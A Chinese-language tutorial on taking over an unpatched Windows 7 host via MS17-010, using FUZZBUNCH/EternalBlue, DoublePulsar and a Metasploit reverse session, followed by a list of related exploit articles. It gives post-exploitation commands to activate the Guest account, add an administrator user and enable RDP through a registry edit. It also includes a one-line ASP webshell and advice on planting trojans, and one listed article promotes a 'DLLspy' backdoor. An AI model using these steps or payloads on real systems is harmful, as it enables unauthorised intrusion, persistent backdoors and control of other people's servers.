ms17-010 漏洞利用并拿下服务器教程

攻击环境：

攻击机win2003

ip:192.168.150.129

Window2003 Python环境及工具

攻击机kali:

ip:192.168.150.128

目标主机window7 x64(未装smb 漏洞补丁）

ip:192.168.150.131

演示操作

第一步：在攻击机Window2003 上进行如下操作

安装以下python工具（32位或64位）并配置系统环境变量

解压到C盘

注意，所有环境安装配置好之后，我们在FUZZBUNCH目录下以CMD形式执行python fb.py命令，将会提示未找到“Listening post”错误，原因在于指定运行配置属性为空，所以，我们可以用编辑器把fb.py源码的第72行“Listening post”相关部分注释掉：

另外，在相同目录下找到Fuzzbunch.xml文件，用我们本地系统相关路径把其中的第19行和第24行路径进行覆盖，如下图所示：

FUZZBUNCH可以正常运行：

FUZZBUNCH的初始化过程中，将会需要输入攻击目标IP（win7）和回连控制IP(kali)，如下图所示：

用EternalBlue攻击并入侵Windows 7/2008

其它配置默认即可(可以直接更改)

再次确定参数

开启攻击，并看到Success

第二步：在另一台攻击机Kali上进行如下操作

1) 在Kali内生成一个Dll劫持文件。

2) 生成的ms17.dll放在Window 2003的C盘内，即C:\ms17.dll

3) 开启并配置msf

4）攻击：exploit 并等待反链接

第三步：攻击机Window2003上操作

1) use Doublepulsar

2) 默认配置即可

3) 攻击成功

第四步：在Kali上控制靶机（win7）

1)在Kali上成功获取会话，可以进行任意操作

3) 获取一个shell

4）查看当前权限

（可以激活Guest用户输入命令

net user guest /active:yes

添加密码net user guest 123.com）

5）创建用户hacker并加入管理员组

6）查看开放端口

7）开启3389端口（win7）

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

8)3389开启成功

9）远程桌面连接

用刚才创建的hacker账户登录

登录成功

注：

溢出后也不一定要非要在cmdshell下开启远程桌面服务；可以echo一个vbs文件，下载远程控制木马，然后在cmdshell里运行一下木马即可连接；还有就是查询目标IP是否绑定有网站，如果有则找到网站目录，再用echo个一句话木马进去（命令是：echo "<%execute request("cmd")%>" > WEB路径/123.asp），用中国年菜刀连接，然后上传大马，或者上传开3389的工具再开启也行。

ms17-010漏洞利用教程的更多相关文章

1. 漏洞利用教程：msfpayload 和 Backdooring EXEs

   漏洞利用教程:msfpayload 和 Backdooring EXEs 此版本的PrimalSec漏洞教程系列将介绍如何使用msfpayload创建各种有效负载.msfpayload是Metaspl ...

2. LNK快捷方式漏洞利用方式 exp制作教程

   前言windows的shell32在处理控制面板程序的快捷方式文件时,存在一个漏洞,能够载入硬盘上的随意DLL文件,就可以运行随意代码. 漏洞文件的生成到“控制面板”以下,右键点“显示”,点“创建快捷 ...

3. apt28组织新的flash漏洞利用包dealerschoice分析

   17号paloalto发布了文章dealerschoice-sofacys-flash-player-exploit-platform,文中提到apt28正在编写adobe flash player的 ...

4. 20155306 白皎 0day漏洞——漏洞利用原理之DEP

   20155306 白皎 0day漏洞--漏洞利用原理之DEP 一.DEP机制的保护原理 1.为什么出现DEP? 溢出攻击的根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计 ...

5. Nessus漏洞扫描教程之使用Nmap工具扫描识别指纹

   Nessus漏洞扫描教程之使用Nmap工具扫描识别指纹 Nmap工具的准备工作 当用户对Nessus工具有清晰的认识后,即可使用该工具实施扫描.但是,在扫描之前需要做一些准备工作,如探测网络中活动的主 ...

6. Windows漏洞利用技术概述

   Windows漏洞利用技术总结 1. 前言 本文是我对漏洞利用技术的学习总结,也是自己践行QAD (Questions.Answer.Discussions)的一次实践.本文通过阅读几位大牛的文章.演 ...

7. Linux环境下常见漏洞利用技术&lpar;培训ppt&plus;实例&plus;exp&rpar;

   记得以前在drops写过一篇文章叫 linux常见漏洞利用技术实践 ,现在还可以找得到(https://woo.49.gs/static/drops/binary-6521.html), 不过当时开始 ...

8. Linux堆溢出漏洞利用之unlink

   Linux堆溢出漏洞利用之unlink 作者:走位@阿里聚安全 0 前言 之前我们深入了解了glibc malloc的运行机制(文章链接请看文末▼),下面就让我们开始真正的堆溢出漏洞利用学习吧.说实话 ...

9. Struts2漏洞利用实例

   Struts2漏洞利用实例 如果存在struts2漏洞的站,administrator权限,但是无法加管理组,内网,shell访问500. 1.struts2 漏洞原理:struts2是一个框架,他在 ...

随机推荐

1. 【以前弄的老东西】DLLspy超犀利后门 （源代码&plus;程序&plus;使用手册&plus;二次开发文档）

   这个玩意儿是很久之前的整的.一直没有做完,但是基本功能和框架都做好了,现在发出来,希望有能力的家伙一起完成.DLLspy,绝对免杀,隐藏,HTTP请求劫持,居家旅行,杀人放火必备良药.有时间我会继续开 ...

2. C&num;怎样处理xml文件的大于号和小于号等常用符号（xml符号引发的程序错误）

   在程序中由xml配置而成的sql语句要转换为C#支持的sql语句 <settings> <select> a.*</select> <from> (se ...

3. Spring addFlashAttribute

   redirectAttributes.addFlashAttribute("result",accountModel); 用这个可以绑定session 但是只能用一次,可以避免最后 ...

4. java的IO学习，字节流与字符流的编码讲解

   字节流与字符流 字节流可以处理所有类型的数据(图片.视频等),在java中对应的类都为“stream”结尾 1字节=8位二进制=具体存储空间   字符流仅能处理纯文本的数据,在java中对应的类都是以 ...

5. &lbrack;偏序关系与CDQ分治&rsqb;【学习笔记】

   组合数学真是太棒了 $CDQ$真是太棒了(雾 参考资料: 1.<组合数学> 2.论文 课件 很容易查到 3.sro __stdcall 偏序关系 关系: 集合$X$上的关系是$X$与$X$ ...

6. Bootstarp-table入门

   介绍 介绍什么的,大家自己去下面的网站看 Bootstrap中文网:http://www.bootcss.com/        Bootstrap Table Demo:http://issues. ...

7. Activity 之生命周期

   Activity 之生命周期 本文内容: 1. Activity 介绍 2. Activity 的生命周期 2.1 生命周期图 2.2 常见情况下生命周期的回调 2.3 关于生命周期常见问题 2.4 ...

8. Linux如何管理目录和文件属性

   概述:在Linux文件系统的安全模型中,为系统中的文件(或目录)赋予了两个属性:访问权限和文件所有者,简称为“权限”和“归属”.其中,访问权限包括读取.写入.可执行三种基本类型,归属包括属主(拥有该文 ...

9. USI和USCI的区别

   在 MSP430 系列中微控制器中有三种串行通讯模块.它们分别是 USART . USI 和 USCI . USART 支持同一硬件模块的两种串行模式,分别是 UART 和 SPI . USART 实 ...

10. javascript 与 PHP 通信加密，使用AES 128 CBC no padding，以及ios，java&comma;c&num;文章例子

    运行环境 php7.0 不适用于 php7.0以上版本,因为mcrypt_encrypt()函数已删除 为何要采用 no padding 这种形式: AES加密如果原输入数据不够16字节的整数位,就要 ...